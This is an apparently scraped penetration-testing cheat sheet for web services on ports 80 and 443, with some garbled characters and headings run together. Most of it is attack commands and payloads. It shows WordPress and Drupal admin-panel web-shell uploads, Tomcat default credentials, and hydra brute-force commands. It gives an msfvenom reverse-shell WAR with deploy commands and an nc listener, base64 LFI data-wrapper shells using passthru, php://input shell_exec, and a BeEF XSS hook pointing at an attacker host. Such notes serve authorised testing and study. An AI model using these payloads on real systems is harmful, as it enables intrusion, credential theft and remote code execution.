ðPort 80-443 (http / https)
Automatic scanners
nikto -h <URL>
python crawleet.py -u <URL> -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 20Wordpress
# Scan
wpscan --rua -e --url <URL>
# Brute force user(s)
wpscan --rua --url <URL> -P <PASSWORDS_LIST> -U "<USER>,<USER>"Wordpress panel RCE
Modifying a php from the theme used (admin credentials needed)
Appearance -> Editor -> 404 Template (at the right)
Change the content for a php shell
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://<IP>/wp-content/themes/twentytwelve/404.phpDrupal
droopescan scan -u <URL>Username enumeration
In /user/register just try to create a username and if the name is already taken it will be notified :
*The name admin is already taken*
If you request a new password for an existing username :
*Unable to send e-mail. Contact the site administrator if the problem persists.*
If you request a new password for a non-existent username :
*Sorry, test is not recognized as a user name or an e-mail address.*
Accessing /user/<number> you can see the number of existing users :
- /user/1 -> Access denied (user exist)
- /user/2 -> Page not found (user doesn't exist)Hidden pages enumeration
Fuzz /node/<NUMBER> where <NUMBER> is a number (from 1 to 500 for example).
You could find hidden pages (test, dev) which are not referenced by the search engines.
wfuzz -c -z range,1-500 --hc 404 <URL>/node/FUZZDrupal panel RCE
You need the plugin php to be installed (check it accessing to /modules/php and if it returns a 403 then, exists, if not found, then the plugin php isn't installed)
Go to Modules -> (Check) PHP Filter -> Save configuration
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
Then click on Add content -> Select Basic Page or Article -> Write php shellcode on the body -> Select PHP code in Text format -> Select PreviewJoomla
joomscan -u <URL>
./joomlavs.rb --url <URL> -a -vTomcat
Default credentials
The most interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files (execute code). But this path is protected by basic HTTP auth, the most common credentials are :
admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcatBrute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f <IP> http-get /manager/html -vV -uTomcat panel RCE
# Generate payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
# Upload payload
Tomcat6 :
wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shell' -O -
Tomcat7 and above :
curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=/shellh&update=true'
# Listener
nc -lvp <PORT>
# Execute payload
curl http://<IP>:8080/shell/WebDav
davtest -url <URL>HTTP brute force authentication
HTTP basic authentication
# Hydra
hydra -l <USER> -V -P <PASSWORDS_LIST> -s 80 -f <IP> http-get /<URL_ENDPOINT>/ -t 15
# Patator
python patator.py http_fuzz auth_type=basic url=<URL> user_pass=FILE0 0=<USER:PASSWORD_LIST> -x ignore:code=401 -x ignore:code=307HTTP GET request
hydra <IP> -V -l <USER> -P <PASSWORDS_LIST> http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t <THREADS_NUMBER>HTTP POST request
hydra -l <USER> -P <PASSWORDS_LIST> <IP> http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t <THREADS_NUMBER>Spidering / Brute force directories / files
gospider -d <DEPTHS> --robots --sitemap -t <THREADS> -s <URL>
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/FUZZ -e .php,.txt -t <THREADS>
dirbuster
Dictionaries :
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirb/big.txt
- /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtFile backups
Once you have found all the files, look for backups of all the executable files (â.phpâ, â.aspxââĶ). Common variations for naming a backup are
file.ext~, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.oldLocal File Inclusion / Remote File Inclusion - LFI / RFI
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20InclusionWrappers
Wrapper php://filter
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=Wrapper expect://
http://example.com/index.php?page=expect://idWrapper data://
echo '<?php phpinfo(); ?>' | base64 -w0 -> PD9waHAgcGhwaW5mbygpOyA/Pgo=
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=
If code execution, you should see phpinfo(), go to the disable_functions and craft a payload with functions which aren't disable.
Code execution with
- exec
- shell_exec
- system
- passthru
- popen
# Exemple
echo '<?php passthru($_GET["cmd"]);echo "Shell done !"; ?>' | base64 -w0 -> PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
If there is "Shell done !" on the webpage, then there is code execution and you can do things like :
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=&cmd=lsWrapper input://
curl -k -v "http://example.com/index.php?page=php://input" --data "<?php echo shell_exec('id'); ?>"Useful LFI list
# Linux
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
# Windows
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
# Both
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txtTools
kadimus --url <URL>
python lfisuite.pyCommand injection
For command injection always use BurpSuite !
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20InjectionDeserialization
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20DeserializationFile upload
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20FilesSQL injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://cobalt.io/blog/a-pentesters-guide-to-sql-injection-sqliXSS
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
beef-xss
cat /usr/share/beef-xss/config.yaml | grep user -C 1 # user / password
<script src="http://<IP>:3000/hook.js"></script>Other web vulnerabilities
https://github.com/swisskyrepo/PayloadsAllTheThingsUpload a file with PUT
curl -X PUT http://<IP>/<FILE> -d @<FILE> -v
Last updated